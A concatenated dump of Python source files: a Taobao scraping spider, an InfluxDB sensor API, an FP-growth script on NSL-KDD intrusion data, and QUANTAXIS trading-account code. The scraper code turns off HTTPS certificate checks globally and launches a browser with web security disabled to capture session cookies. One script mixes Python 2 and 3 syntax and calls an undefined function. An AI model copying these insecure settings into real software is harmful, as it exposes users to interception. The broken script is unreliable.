self.unmarshal(context=context, response=response)
return True
def unmarshal(self, context, response):
result = response.json()
context.attach(Context.KEY_TAOBAO_SALE_RESULT, result)
def on_create(self, context):
pass
def on_start(self, context):
pass
def on_complete(self, context):
pass
def on_destroy(self, context):
pass
```
#### File: spiders/actions/task_direct_collect_action.py
```python
from common.db import write_session_scope
from mall_spider.dao.stream_unhandle_task_dao import get_stream_unhandle_task_dao
from mall_spider.model.cmm_sys_stream_unhandle_task import CmmSysStreamUnhandleTask
from mall_spider.spiders.actions.context import Context
from mall_spider.spiders.actions.default_action import DefaultAction
class TaskDirectCollectAction(DefaultAction):
def do_execute(self, context):
task_type = int(context.get(Context.KEY_CURRENT_TASK_TYPE))
date_str = context.get(Context.KEY_DIRECT_COLLECT_DATE)
with write_session_scope() as session:
# stream_opt_data_dao = get_stream_opt_data_dao(session=session)
stream_unhandle_task_dao = get_stream_unhandle_task_dao(session=session)
tasks = stream_unhandle_task_dao.query(entities=[CmmSysStreamUnhandleTask.id, CmmSysStreamUnhandleTask.type,
CmmSysStreamUnhandleTask.raw_data,
CmmSysStreamUnhandleTask.origin_id],
_filter=[CmmSysStreamUnhandleTask.type == task_type,
CmmSysStreamUnhandleTask.date == date_str])
context.attach(Context.KEY_CURRENT_TASKS, tasks)
return True
def on_create(self, context):
pass
def on_start(self, context):
pass
def on_complete(self, context):
pass
def on_destroy(self, context):
pass
```
#### File: mall_spider/spiders/chrome_qt.py
```python
import sys
from http.cookies import SimpleCookie
from PyQt5.QtCore import QUrl
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineProfile
from PyQt5.QtWidgets import QWidget, QDesktopWidget, QApplication, QVBoxLayout
from requests.cookies import RequestsCookieJar
class ChromeQt(QWidget):
def cookie_added(self, cookie):
raw_form = bytes(cookie.toRawForm()).decode()
simple_cookie = SimpleCookie(raw_form)
for cookie in simple_cookie.values():
self.cookies.set(cookie.key, cookie)
def __init__(self):
super().__init__()
self.init_ui()
# 脚本
self.profile = QWebEngineProfile.defaultProfile()
# requests cookies
self.cookies = RequestsCookieJar()
# qt cookies
self.profile.setPersistentCookiesPolicy(0)
self.cookie_store = self.profile.cookieStore()
self.cookie_store.cookieAdded.connect(self.cookie_added)
# exit
# self.webView.loadFinished.connect(self.load_finished)
def load_finished(self):
self.close()
def init_ui(self):
self.webView = QWebEngineView()
# 主界面
layout = QVBoxLayout(self)
layout.addWidget(self.webView)
self.show()
self.resize(1024, 800)
self.center()
def center(self):
# frameGeometry() 方法允许我们创建一个无形矩形并根据主窗口的宽高设置自身的宽度与高度。简单理解就是将这个控件(QWidget)的几何内容(宽高位置等),赋值给qr
qr = self.frameGeometry()
# 计算出你的显示器的屏幕分辨率。根据得到的分辨率我们得到屏幕的中心点。
cp = QDesktopWidget().availableGeometry().center()
# 我们的矩形(qr)已有宽度和高度,现在设置移动矩形的中心(moveCenter)到屏幕的中心点(cp),矩形的尺寸是不变的。
qr.moveCenter(cp)
# 移动应用程序窗口的左上角到qr矩形的左上角,从而使应用程序窗口显示在屏幕的中心。
self.move(qr.topLeft())
def load(self, url):
self.webView.load(QUrl(url))
def chrome_qt_bootstrap(url=None):
sys.argv.append('--disable-web-security')
sys.argv.append('--allow-file-access-from-files')
sys.argv.append('--allow-file-access')
app = QApplication(sys.argv)
b = ChromeQt()
b.load(url)
app.exec_()
return b.cookies
if __name__ == '__main__':
url = 'https://main.m.taobao.com/mytaobao/index.html'
cookies = chrome_qt_bootstrap(url)
print(cookies)
```
#### File: mall_spider/utils/money_util.py
```python
def yuan_2_cent(yuan):
return str(int(float(yuan) * 100))
def cent_2_yuan(cent):
return str(int(float(cent) / 100))
```
#### File: mall_spider/utils/parallel_task.py
```python
import os
import gevent
from config.config_loader import logger
os.environ['GEVENT_RESOLVER'] = 'ares'
class ParallelTask(object):
# float timeout: If given, the maximum number of seconds to wait.
def __init__(self, timeout=None, raise_error=False):
self.timeout = timeout
self.raise_error = raise_error
self.tasks = []
def add_task(self, task, *args):
self.tasks.append(gevent.spawn(task, *args))
def run(self):
try:
gevent.joinall(self.tasks, timeout=self.timeout, raise_error=self.raise_error)
except Exception as ex:
logger.warning("[ParallelTask] run task fail", exc_info=1)
raise ex
return [task.value for task in self.tasks]
```
#### File: mall_spider/utils/requests_client.py
```python
import warnings
import requests
from urllib3.exceptions import InsecureRequestWarning
from mall_spider.utils import default_connect_timeout, default_timeout
class XSession(requests.Session):
def __init__(self):
super().__init__()
self.verify = False
# Requests 似乎不能使用系统的证书系统, 方便起见, 不验证 HTTPS 证书, 便于使用代理工具进行网络调试...
# http://docs.python-requests.org/en/master/user/advanced/#ca-certificates
requests.Session = XSession
warnings.simplefilter('ignore', InsecureRequestWarning)
def get(url, params=None, headers=None, cookies=None, proxies=None, **kwargs):
session = requests.Session()
if headers:
session.headers.update(headers)
if cookies:
session.cookies = cookies
if proxies:
session.proxies = proxies
return execute(session.get, url, params=params, **kwargs)
def post(url, data=None, json=None, headers=None, cookies=None, proxies=None, **kwargs):
session = requests.Session()
if headers:
session.headers.update(headers)
if cookies:
session.cookies = cookies
if proxies:
session.proxies = proxies
return execute(session.post, url, data=data, json=json, **kwargs)
def execute(request, url, **kwargs):
connect_timeout = float(kwargs.pop('connect_timeout', default_connect_timeout))
timeout = float(kwargs.pop('timeout', default_timeout))
return request(url, timeout=(connect_timeout, timeout), **kwargs)
# timeout = float(kwargs.pop('timeout', default_timeout))
# retry = int(kwargs.pop('retry', default_retry))
# retry_interval = float(kwargs.pop('retry_interval', default_retry_interval))
# start_time = time.time()
# response = None
#
# while retry > 0:
# try:
# response = request(url, *args, timeout=connect_timeout, **kwargs)
# except ReadTimeout as e:
# logging.error(u'request url %s read time out,exp:%s' % (url, e))
# except RequestException as e:
# logging.error(u'request url %s execute time out' % url)
#
# while retry > 0:
# try:
# response = request(url, *args, timeout=connect_timeout, **kwargs)
# except RequestException as e:
# logging.info("Failed to get %s, exception: %s", url, e.message)
# if time.time() - start_time > timeout or response is not None:
# break
# retry -= 1
# time.sleep(retry_interval)
# if response is None:
# raise RequestException("Failed to request %s, request_body: %r" % (url, args))
# return response
```
#### File: mall_spider/utils/session_id_generator.py
```python
from abc import ABCMeta, abstractmethod
class SessionIdGenerator(object):
__metaclass__ = ABCMeta
@abstractmethod
def generate_id(self, session):
pass
```
#### File: test/common/test_util.py
```python
from unittest import TestCase
from common.db import write_session_scope
from common.retry import retry
from mall_spider.common.constants import Category
from mall_spider.common.enums import TaobaoTaskType
from mall_spider.dao.stream_unhandle_task_dao import get_stream_unhandle_task_dao
from mall_spider.model.cmm_sys_stream_unhandle_task import CmmSysStreamUnhandleTask
from mall_spider.spiders.actions.context import Context
from mall_spider.spiders.actions.pojo import Good
from mall_spider.spiders.actions.task_collect_action import TaskCollectAction
class TestUtil(TestCase):
@retry
def _retry(self):
print('retry')
raise Exception()
def test_retry(self):
self._retry()
def test_category(self):
rst = Category.check_cate_id(50015558, 50015560)
self.assertEqual(True, rst)
def test_get_tasks(self):
"""
get main category id that have sub category id
:return:
"""
accounts_category_ids_dict = Category.accounts_category_ids_dict
for key, value in accounts_category_ids_dict.items():
if value:
print(key)
def test_init_unhandle_tasks(self):
context = Context()
context.attach(Context.KEY_CURRENT_TASK_TYPE, TaobaoTaskType.sycm_init)
action = TaskCollectAction()
action.execute(context=context)
tasks = context.get(Context.KEY_CURRENT_TASKS, [])
for task in tasks:
id_ = task.id
raw_data = task.raw_data
date = raw_data['dateStr']
with write_session_scope() as session:
stream_unhandle_task_dao = get_stream_unhandle_task_dao(session=session)
mod_dict = {
'date': date
}
stream_unhandle_task_dao.update(mod_dict=mod_dict, _filter=[CmmSysStreamUnhandleTask.id == id_])
context = Context()
context.attach(Context.KEY_CURRENT_TASK_TYPE, TaobaoTaskType.sycm_list)
action = TaskCollectAction()
action.execute(context=context)
tasks = context.get(Context.KEY_CURRENT_TASKS, [])
for task in tasks:
id_ = task.id
raw_data = task.raw_data
good = Good(raw_data['goodResult'])
date = good.get_date()
with write_session_scope() as session:
stream_unhandle_task_dao = get_stream_unhandle_task_dao(session=session)
mod_dict = {
'date': date
}
stream_unhandle_task_dao.update(mod_dict=mod_dict, _filter=[CmmSysStreamUnhandleTask.id == id_])
context = Context()
context.attach(Context.KEY_CURRENT_TASK_TYPE, TaobaoTaskType.taobao_list)
action = TaskCollectAction()
action.execute(context=context)
tasks = context.get(Context.KEY_CURRENT_TASKS, [])
for task in tasks:
id_ = task.id
raw_data = task.raw_data
good = Good(raw_data['goodResult'])
date = good.get_date()
with write_session_scope() as session:
stream_unhandle_task_dao = get_stream_unhandle_task_dao(session=session)
mod_dict = {
'date': date
}
stream_unhandle_task_dao.update(mod_dict=mod_dict, _filter=[CmmSysStreamUnhandleTask.id == id_])
``` |
{
"source": "524c/esp32-grafana",
"score": 3
} |
#### File: 524c/esp32-grafana/server.py
```python
from fastapi import FastAPI
from typing import Optional
from pydantic import BaseModel
import uvicorn
from influxdb_client import InfluxDBClient, Point
from influxdb_client.client.write_api import SYNCHRONOUS
# influx interface class
class SensorData(object):
def __init__(self, bucket, org, token):
self.bucket = bucket
self.token = token
self.org = org
self.client = InfluxDBClient(url="http://localhost:8086", token=token, org=org)
self.write_api = self.client.write_api(write_options=SYNCHRONOUS)
self.query_api = self.client.query_api()
def write(self, point):
# p = Point("my_measurement").tag("location", "Prague").field("temp", 25.3)
# write_api.write(bucket=bucket, record=p)
self.write_api.write(bucket=self.bucket, record=point)
def query(self, query):
return self.query_api.query(query)
def get_last_point(self, measurement, tag_key, tag_value):
query = f"select * from {measurement} where {tag_key} = '{tag_value}' order by time desc limit 1"
return self.query(query)
def query_csv(self, query):
# query_csv('from(bucket:"my-bucket") |> range(start: -10m)')
return self.query_api.query_csv(query)
class Sensor(BaseModel):
name: str
sensor1: float
sensor2: Optional[float] = None
description: Optional[str] = None
app = FastAPI()
INFLUXDB_BUCKET = "causa_efeito"
INFLUXDB_ORG = "causa_efeito"
influx = SensorData(bucket=INFLUXDB_BUCKET, org=INFLUXDB_ORG, token="<PASSWORD>")
@app.get("/")
async def root():
return {"message": "Hello World"}
@app.post("/api/v1/sensor")
async def create_item(sensor: Sensor) -> str:
data = sensor.dict()
print(f"post data: {data}")
p = (
Point("metric")
.tag("sensor", data["name"])
.field("sensor1", data["sensor1"])
.field("sensor2", data["sensor2"])
.field("time_precision", "ms")
)
influx.write(p)
return "ok"
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000)
``` |
{
"source": "525309178/fp-growth",
"score": 2
} |
#### File: 525309178/fp-growth/test2.py
```python
from __future__ import print_function
# python3
# -*- coding: utf-8 -*-
# @Author : lina
# @Time : 2018/5/13 11:40
import fp_growth_py3 as fpg
import fp_growth as fpg1
import pandas as pd
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
from keras.callbacks import ReduceLROnPlateau
import numpy as np
from sklearn.model_selection import train_test_split
import pandas as pd
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
from keras.callbacks import ReduceLROnPlateau
import numpy as np
import os
np.random.seed(1337) # for reproducibility
from keras.preprocessing import sequence
from keras.utils import np_utils
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Embedding,BatchNormalization
from keras.layers import LSTM, SimpleRNN, GRU
from keras.datasets import imdb
from keras.utils.np_utils import to_categorical
from sklearn.metrics import (precision_score, recall_score,f1_score, accuracy_score,mean_squared_error,mean_absolute_error)
from sklearn import metrics
from sklearn.preprocessing import Normalizer, OneHotEncoder,LabelBinarizer
from sklearn import preprocessing
import h5py
from keras import callbacks
from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, CSVLogger
# 数据集
dataset = [
['啤酒', '牛奶', '可乐'],
['尿不湿', '啤酒', '牛奶', '橙汁'],
['啤酒', '尿不湿'],
['啤酒', '可乐', '尿不湿'],
['啤酒', '牛奶', '可乐']
] #type list
###################################################################################################
train_path = './KDDTrain+_2.csv'
test_path = './KDDTest+_2.csv'
save_path = '/home/administrator/PycharmProjects/Network-Intrusion-Detection-DNN/NSL-KDD-TEST/checkpoint'
# traindata = pd.read_csv('/home/administrator/PycharmProjects/Network-Intrusion-Detection-DNN/NSL-KDD-TEST/dataset/KDDTrain+_2.csv', header=None)
# testdata = pd.read_csv('/home/administrator/PycharmProjects/Network-Intrusion-Detection-DNN/NSL-KDD-TEST/dataset/KDDTest+_2.csv', header=None)
# Step 1: Data preprocessing:
# 1 attach the column names to the dataset 为数据集每列添加对应的属性名称
col_names = ["duration","protocol_type","service","flag","src_bytes",
"dst_bytes","land","wrong_fragment","urgent","hot","num_failed_logins",
"logged_in","num_compromised","root_shell","su_attempted","num_root",
"num_file_creations","num_shells","num_access_files","num_outbound_cmds",
"is_host_login","is_guest_login","count","srv_count","serror_rate",
"srv_serror_rate","rerror_rate","srv_rerror_rate","same_srv_rate",
"diff_srv_rate","srv_diff_host_rate","dst_host_count","dst_host_srv_count",
"dst_host_same_srv_rate","dst_host_diff_srv_rate","dst_host_same_src_port_rate",
"dst_host_srv_diff_host_rate","dst_host_serror_rate","dst_host_srv_serror_rate",
"dst_host_rerror_rate","dst_host_srv_rerror_rate","label"]
# 2 Load the Dataset
df = pd.read_csv(train_path, header=None, names = col_names)
df_test = pd.read_csv(test_path, header=None, names = col_names)
# shape, this gives the dimensions of the dataset
# print('Dimensions of the Training set:',df.shape)
# print('Dimensions of the Test set:',df_test.shape)
# first five rows of dataset
# print(df.head(5))
# print(df.describe())
# Label Distribution of Training and Test set
# print('Label distribution Training set:')
# print(df['label'].value_counts())
# print()
# print('Label distribution Test set:')
# print(df_test['label'].value_counts())
# 查看有哪些属性是类别而不是数值,将其转为数字标识 colums that are categorical and not binary yet: protocol_type (column 2), service (column 3), flag (column 4).
# explore categorical features
# print('Training set:')
# for col_name in df.columns:
# if df[col_name].dtypes == 'object' :
# unique_cat = len(df[col_name].unique())
# print("Feature '{col_name}' has {unique_cat} categories".format(col_name=col_name, unique_cat=unique_cat))
# see how distributed the feature service is, it is evenly distributed and therefore we need to make dummies for all.
# print()
# print('Distribution of categories in service:')
# print(df['service'].value_counts().sort_values(ascending=False).head())
# Test set
# print('Test set:')
# for col_name in df_test.columns:
# if df_test[col_name].dtypes == 'object' :
# unique_cat = len(df_test[col_name].unique())
# print("Feature '{col_name}' has {unique_cat} categories".format(col_name=col_name, unique_cat=unique_cat))
# 3 选出需要数值化处理的类别特征'protocol_type', 'service', 'flag'
# insert code to get a list of categorical columns into a variable, categorical_columns
categorical_columns=['protocol_type', 'service', 'flag','label']
# 从原有数据集中先提取出这三个类别对应的数据到:df_categorical_values与testdf_categorical_values中
df_categorical_values = df[categorical_columns]
testdf_categorical_values = df_test[categorical_columns]
# print(df_categorical_values.head())
# 提取出剩余的离散特征
se_column = ["land","logged_in","root_shell","su_attempted","is_host_login","is_guest_login"]
df_sep_values = df[se_column]
testdf_sep_values = df_test[se_column]
for feature in se_column:
df_sep_values[feature].replace([0,1],['no_'+feature,feature],inplace=True)
# print(df_sep_values.head())
newdf = pd.DataFrame()
newdf =pd.concat([df_sep_values,df_categorical_values], axis=1)
print(newdf.head())
newdf = np.array(newdf)
newdf = newdf.tolist()
print(newdf[1])
print(newdf[2])
# 关联规则生成函数
def generateRules(L, supportData, minConf=0.7):
bigRuleList = []
for i in range(1, len(L)):
for freqSet in L[i]:
H1 = [frozenset([item]) for item in freqSet]
if (i > 1):
# 三个及以上元素的集合
rulesFromConseq(freqSet, H1, supportData, bigRuleList, minConf)
else:
# 两个元素的集合
calcConf(freqSet, H1, supportData, bigRuleList, minConf)
return bigRuleList
def calcConf(freqSet, H, supportData, brl, minConf=0.7):
''' 对候选规则集进行评估 '''
prunedH = []
for conseq in H:
conf = supportData[freqSet] / supportData[freqSet - conseq]
if conf >= minConf:
print freqSet - conseq, '-->', conseq, 'conf:', conf
brl.append((freqSet - conseq, conseq, conf))
prunedH.append(conseq)
return prunedH
def rulesFromConseq(freqSet, H, supportData, brl, minConf=0.7):
''' 生成候选规则集 '''
m = len(H[0])
if (len(freqSet) > (m + 1)):
Hmpl = aprioriGen(H, m + 1)
Hmpl = calcConf(freqSet, Hmpl, supportData, brl, minConf)
if (len(Hmpl) > 1):
rulesFromConseq(freqSet, Hmpl, supportData, brl, minConf)
if __name__ == '__main__':
'''
调用find_frequent_itemsets()生成频繁项
@:param minimum_support表示设置的最小支持度,即若支持度大于等于inimum_support,保存此频繁项,否则删除
@:param include_support表示返回结果是否包含支持度,若include_support=True,返回结果中包含itemset和support,否则只返回itemset
'''
frequent_itemsets = fpg.find_frequent_itemsets(newdf, minimum_support=4, include_support=True)
print(type(frequent_itemsets)) # print type
result = []
for itemset, support in frequent_itemsets: # 将generator结果存入list
result.append((itemset, support))
# result = sorted(result, key=lambda i: i[0]) # 排序后输出
for itemset, support in result:
print(str(itemset) + ' ' + str(support))
``` |
{
"source": "5267/QUANTAXIS",
"score": 3
} |
#### File: QUANTAXISMessageQueue/socket/example_socket.py
```python
import websocket
import threading
import time
from websocket import create_connection
def on_message(ws, message):
print (message)
def on_error(ws, error):
print( error)
def on_close(ws):
print ("### closed ###")
def on_open(ws):
def run(*args):
for i in range(3):
time.sleep(1)
ws.send("Hello %d" % i)
time.sleep(1)
ws.close()
print ("thread terminating...")
run()
if __name__ == "__main__":
ws = websocket.WebSocketApp("ws://localhost:8000/",
on_message = on_message,
on_error = on_error,
on_close = on_close)
ws.send("login")
print ("Sent")
print ("Receiving...")
result = ws.recv()
print ("Received '%s'" % result)
ws.on_open = on_open
ws.close()
ws.run_forever()
```
#### File: QUANTAXIS/QAARP/__init__.py
```python
from .QAAccount import QA_Account
from .QARisk import QA_Risk
from .QAPortfolio import QA_Portfolio
class QA_ARP():
def __init__(self):
pass
def QA_ARP_A2R(self,QA_Account,QA_Risk):
pass
def QA_ARP_R2P(self,QA_Risk,QA_Portfolio):
pass
def QA_ARP_P2R(self,QA_Risk,QA_Portfolio):
pass
def QA_ARP_R2A(self,QA_Account,QA_Risk):
pass
```
#### File: QUANTAXIS/QAARP/QAAccount.py
```python
from QUANTAXIS.QAUtil import QA_util_log_info
from QUANTAXIS.QABacktest import QAAnalysis as Ana
from .QARisk import *
import random
import datetime
class QA_Account:
assets=1000
portfolio={'date':'', 'id':'N',' price':'', 'amount':0}
history_trade=[['date', 'id',' price', 'amount',' towards']]
total_profit=[0]
total_cur_profit_present=[0]
assets_market_hold_value=0
assets_profit_total=[0]
cur_profit_present_total=[0]
cur_profit_present=0
#date, id, price, amount, towards
#account_cookie=str(random.random())
portfit=0
hold=0
def init(self):
#assets=1000
self.portfolio={'date':'', 'id':'N',' price':'', 'amount':0}
self.history_trade=[['date', 'id',' price', 'amount',' towards']]
self.total_profit=[0]
self.total_cur_profit_present=[0]
self.assets_market_hold_value=0
self.assets_profit_total=[0]
self.cur_profit_present_total=[0]
self.cur_profit_present=0
#date, id, price, amount, towards
self.account_cookie=str(random.random())
self.portfit=0
self.account_date=[]
self.hold=0
self.total_date=[]
self.total_assest=[self.assets]
self.assets_free=self.total_assest[-1]
self.total_assest_free=[self.assets_free]
self.message={
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':'',
'strategy':''
}
},
'body':{
'account':{
'init_assest':self.assets,
'portfolio':{'date':'', 'id':'N',' price':'', 'amount':0},
'history':[['date', 'id',' price', 'amount',' towards']],
'assest_now':self.total_assest[-1],
'assest_history':self.total_assest,
'assest_free':self.assets_free,
'total_assest_free':self.total_assest_free,
'assest_fix':self.assets_market_hold_value,
'account_date':self.account_date,
'total_date':self.total_date,
'profit':self.portfit,
'total_profit':[0],
'cur_profit_present':0,
'cur_profit_present_total':[0],
'hold':self.hold
},
'bid':{},
'market':{},
#'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
}
}
def QA_account_get_cash(self):
return self.assets
def QA_account_get_portfolio(self):
return self.portfolio
def QA_account_get_amount(self):
pass
def QA_account_get_history(self):
return self.history_trade
def QA_Account_get_cookie(self):
return self.account_cookie
def QA_account_update(self,update_message,client):
#print(update_message)
self.total_date.append(update_message['date'])
if str(update_message['status'])[0]=='2':
#这里就是买卖成功的情况
# towards>1 买入成功
# towards<1 卖出成功
# 拿到新的交易的价格等
self.account_date.append(update_message['date'])
# QA_util_log_info('Success')
new_id=update_message['id']
new_amount=update_message['amount']
new_trade_date=update_message['date']
new_towards=update_message['towards']
new_price=update_message['price']
# 先计算收益和利润
self.QA_account_calc_profit(update_message)
if int(new_towards)>0:
self.portfolio['date']=new_trade_date
self.portfolio['price']=new_price
self.portfolio['id']=new_id
self.portfolio['amount']=new_amount
self.hold=1
# 将交易记录插入历史交易记录
appending_list=[new_trade_date, new_id, new_price, new_amount, new_towards]
self.history_trade.append(appending_list)
else :
self.portfolio['date']=''
self.portfolio['price']=0
self.portfolio['id']='N'
self.portfolio['amount']=0
self.hold=0
# 将交易记录插入历史交易记录
appending_list=[new_trade_date, new_id, new_price, new_amount, new_towards]
self.history_trade.append(appending_list)
#这里是不需要插入到历史记录里面的
self.message={
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':update_message['user'],
'strategy':update_message['strategy'],
'code':update_message['bid']['code']
}
},
'body':{
'account':{
'init_assest':self.total_assest[0],
'portfolio':self.portfolio,
'history':self.history_trade,
'assest_now':self.total_assest[-1],
'assest_history':self.total_assest,
'assest_free':self.assets_free,
'total_assest_free':self.total_assest_free,
'assest_fix':self.assets_market_hold_value,
'profit':self.total_profit[-1],
'account_date':self.account_date,
'assets_profit_day':0,
'assets_profit_total':[0],
'total_profit':self.total_profit,
'total_date':self.total_date,
'cur_profit_present':self.cur_profit_present,
'cur_profit_present_total':self.cur_profit_present_total,
'hold':self.hold
},
'bid':update_message['bid'],
'market':update_message['market'],
'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
}
}
elif update_message['status']==401:
# 这里就是没有交易成功的情况
# 1.空单 401
# 2.买卖没有成功
self.QA_account_calc_profit(update_message)
self.account_date.append(update_message['date'])
#QA_util_log_info('hold without bid')
#print(update_message['user'])
message={
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':update_message['user'],
'strategy':update_message['strategy'],
'code':update_message['bid']['code']
}
},
'body':{
'account':{
'init_assest':self.assets,
'portfolio':self.portfolio,
'history':self.history_trade,
'assest_now':self.assets,
'assest_history':self.total_assest,
'assest_free':self.assets_free,
'total_assest_free':self.total_assest_free,
'assest_fix':self.assets_market_hold_value,
'profit':self.portfit,
'account_date':self.account_date,
'total_profit':self.total_profit,
'total_date':self.total_date,
'cur_profit_present':self.cur_profit_present,
'cur_profit_present_total':self.cur_profit_present_total,
'hold':self.hold
},
'bid':update_message['bid'],
'market':update_message['market'],
#'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
}
}
self.message=message
#print(message)
#属于不更新history和portfolio,但是要继续增加账户和日期的
elif update_message['status']==402:
#QA_util_log_info('bid not success')
message={
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':update_message['user'],
'strategy':update_message['strategy'],
'code':update_message['bid']['code']
}
},
'body':{
'account':{
'init_assest':self.assets,
'portfolio':self.portfolio,
'history':self.history_trade,
'assest_now':self.assets,
'assest_history':self.total_assest,
'total_assest_free':self.total_assest_free,
'assest_free':self.assets_free,
'assest_fix':self.assets_market_hold_value,
'profit':self.portfit,
'total_profit':self.total_profit,
'account_date':self.account_date,
'total_date':self.total_date,
'cur_profit_present':self.cur_profit_present,
'cur_profit_present_total':self.cur_profit_present_total,
'hold':self.hold
},
'bid':update_message['bid'],
'market':update_message['market'],
#'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
}
}
self.message=message
#print(self.message)
return self.message
def QA_account_renew(self):
#未来发送给R,P的
pass
def QA_account_calc_profit(self,update_message):
# print(update_message)
if update_message['status']==200 and update_message['towards']==1:
# 买入/
# 证券价值=买入的证券价值+持有到结算(收盘价)的价值
now_price=float(update_message['market']['close']) #收盘价
# 买入的部分在update_message
buy_price=update_message['price']
#可用资金=上一期可用资金-买入的资金
self.assets_free=float(self.total_assest_free[-1])-float(update_message['price'])*float(update_message['amount'])*update_message['towards']
#更新可用资金历史
self.total_assest_free.append(self.assets_free)
#证券价值
self.assets_market_hold_value=update_message['amount']*now_price
self.assets=self.assets_free+self.assets_market_hold_value
self.total_assest.append(self.assets)
self.profit=(self.total_assest[-1]-self.total_assest[0])/self.total_assest[0]
self.total_profit.append(self.profit)
self.cur_profit_present=(now_price-float(update_message['price']))/(float(update_message['price']))
#print(now_price)
#print(self.portfolio['price'])
#self.assets_market_hold_value=float(now_price)*int(self.portfolio['amount'])
#success trade, buy
elif update_message['status']==200 and update_message['towards']==-1:
#success trade,sell
# 证券价值=买入的证券价值+持有到结算(收盘价)的价值
now_price=float(update_message['market']['close']) #收盘价
# 买入的部分在update_message
buy_price=update_message['price']
#卖出的时候,towards=-1,所以是加上卖出的资产
#可用资金=上一期可用资金+卖出的资金
self.assets_free=float(self.total_assest_free[-1])-float(update_message['price'])*float(update_message['amount'])*update_message['towards']
#更新可用资金历史
self.total_assest_free.append(self.assets_free)
self.assets_market_hold_value=(self.portfolio['amount']-update_message['amount'])*now_price
self.assets=self.assets_free+self.assets_market_hold_value
self.total_assest.append(self.assets)
self.profit=(self.total_assest[-1]-self.total_assest[0])/self.total_assest[0]
self.total_profit.append(self.profit)
# 单笔交易利润是买入价
self.cur_profit_present=(float(update_message['price'])-float(self.portfolio['price']))/float((self.portfolio['price']))
self.cur_profit_present_total.append(self.cur_profit_present)
elif update_message['status']==401 :
# hold
if (self.portfolio['amount']==0):
self.total_assest_free.append(self.assets_free)
#self.assets=self.assets_free+self.assets_market_hold_value
self.total_assest.append(self.assets)
self.profit=0
self.total_profit.append(self.profit)
self.cur_profit_present=0
self.cur_profit_present_total.append(self.cur_profit_present)
else:
now_price=float(update_message['market']['close'])
self.total_assest_free.append(self.assets_free)
self.assets_market_hold_value=self.portfolio['amount']*now_price
self.assets=self.assets_free+self.assets_market_hold_value
self.total_assest.append(self.assets)
self.profit=(self.total_assest[-1]-self.total_assest[0])/self.total_assest[0]
self.total_profit.append(self.profit)
self.cur_profit_present=(float(now_price)-float(self.portfolio['price']))/(float(self.portfolio['price']))
self.cur_profit_present_total.append(self.cur_profit_present)
elif update_message['update']==402 :
pass
"""
profit=0
for item in range(1,len(self.history_trade),1):
# history:
# date, id, price, amount, towards
profit=profit-float(self.history_trade[item][2])*float(self.history_trade[item][3])*float(self.history_trade[item][4])
if str(self.portfolio['id'])[0]=='N' :
self.hold=0
else :self.hold=1
# calc
now_price=float(update_message['market']['close'])
if (int(self.hold==1)):
#QA_util_log_info('hold-=========================================')
#(当前价-买入价)*量
profit=profit+(now_price-float(self.portfolio['price']))*int(self.portfolio['amount'])+float(self.history_trade[-1][2])*float(self.history_trade[-1][3])*float(self.history_trade[-1][4])
#print(now_price)
#print(self.portfolio['price'])
self.cur_profit_present=(now_price-float(self.portfolio['price']))/(float(self.portfolio['price']))
self.assets_market_hold_value=float(now_price)*int(self.portfolio['amount'])
self.assets=float(self.assets_free)+float(self.assets_market_hold_value)
else:
#QA_util_log_info('No hold-=========================================')
profit=profit
self.cur_profit_present=0
#print('---profit--')
#print(profit)
#print(now_price)
#print(self.portfolio['amount'])
"""
def QA_account_analysis(self):
pass
def QA_Account_get_message(self):
return self.message
def QA_account_receive_deal(self,message,client):
#print(message)
messages=self.QA_account_update({
'code':message['header']['code'],
'status':message['header']['status'],
'price':message['body']['bid']['price'],
'id':message['body']['bid']['code'],
'amount':message['body']['bid']['amount'],
'towards':message['body']['bid']['towards'],
'date':message['body']['bid']['time'],
'user':message['header']['session']['user'],
'strategy':message['header']['session']['strategy'],
'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp()),
'bid':message['body']['bid'],
'market':message['body']['market']
},client)
return messages
```
#### File: QAFetch/QACrawlData/__init__.py
```python
import QACrawlData.getdata as gt
def get_financial(symbol):#3大财报
return gt.get_financial(symbol)
def get_ipo():#新股
return gt.ths_ipo()
def get_tfp(Date):#停复牌
return gt.get_tfp(Date)
def get_brief(symbol_list):# 公司概况
return gt.get_brief(symbol_list)
def get_lastest(symbol_list):#最新资料
return gt.get_lastest(symbol_list)
def get_dividend(symbol):#分红
return gt.get_dividend(symbol)
def get_allotment(symbol):#配股
return gt.get_allotment(symbol)
def get_fh_all():#当年全部股票的分红资料
return gt.get_fh_all()
def get_stocklist():#全部股票列表
return gt.get_stocklist()
def get_last_daybar(symbol_list):#股票日线截面数据
return gt.get_last_dailybar(symbol_list)
def get_last_tick(symbol_list):#最后1个tick
return gt.get_last_tick(symbol_list)
def get_last100_ticks(symbol_list):#最后100个tick
return gt.get_last100_ticks(symbol_list)
def get_all_ticks(symbol_list):#当日全部tick
return gt.get_all_ticks(symbol_list)
def get_moneyflow(symbol_list):#当日资金流量截面数据
return gt.get_moneyflow(symbol_list)
def get_money_on_minute(symbol):#当日资金流量每分钟数据
return gt.get_money_on_minute(symbol)
def get_tick_history(symbol,Date):#历史TICK接口
return gt.get_tick_history(symbol,Date)
def get_fjb(tick):
return tick.groupby(['close']).sum()
def tick_to_min(tick,n):
return gt.tick_to_min(tick,n)
def get_last_n_daybar(symbol,n,Type):#cs =['600100', 200, 'qfq']
cs= [symbol,n,Type]
return gt.get_last_n_dailybars(cs)
def get_all_daybar(symbol,Type):#cs=['600100','qfq']#
cs =[symbol,Type]
return gt.get_all_dailybars(cs)
def get_yearlist(symbol):
cs =[symbol,'bfq']
return gt.get_yearlist(cs)
def get_daybar_year(symbol,year,Type):
cs = [symbol,year,Type]
return gt.get_dailybars_year(cs)
